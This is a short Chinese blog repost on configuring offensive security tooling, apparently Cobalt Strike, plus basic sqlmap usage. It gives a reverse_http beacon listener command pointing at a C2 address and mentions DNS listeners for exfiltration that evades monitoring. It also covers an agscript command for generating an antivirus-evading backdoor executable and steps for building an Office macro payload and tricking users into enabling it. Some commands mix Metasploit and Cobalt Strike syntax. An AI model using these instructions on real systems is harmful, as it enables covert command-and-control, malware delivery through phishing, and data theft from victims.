安全工具配置

2025/5/21 17:25:56 来源：https://blog.csdn.net/2402_86373248/article/details/148084449 浏览: 次关键词：安全工具配置

3.1 工具使用

监听器（Listener）配置

- HTTP/HTTPS监听器：

# 配置HTTP监听器（默认端口80） set payload windows/beacon_http/reverse_http set Host 192.168.1.10 set Port 80 exploit -j

- DNS监听器：绕过网络监控，通过DNS协议回传数据（需配置域名解析指向C2服务器）。

后门生成与权限维持

- Windows可执行文件：

bash # 生成免杀后门（使用混淆模板） ./agscript.sh <团队服务器> <用户> <密码> artifact-kit/pe_templates_template.x64.exe

- Office宏后门：

1. 生成宏Payload：Attacks → Packages → Microsoft Office Macro。

2. 插入Word文档，诱导用户启用宏触发上线。

基础命令

# 检测目标是否存在注入

sqlmap -u "http://target.com/page?id=1" --batch

# 获取数据库名称

sqlmap -u "http://target.com/page?id=1" --dbs

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com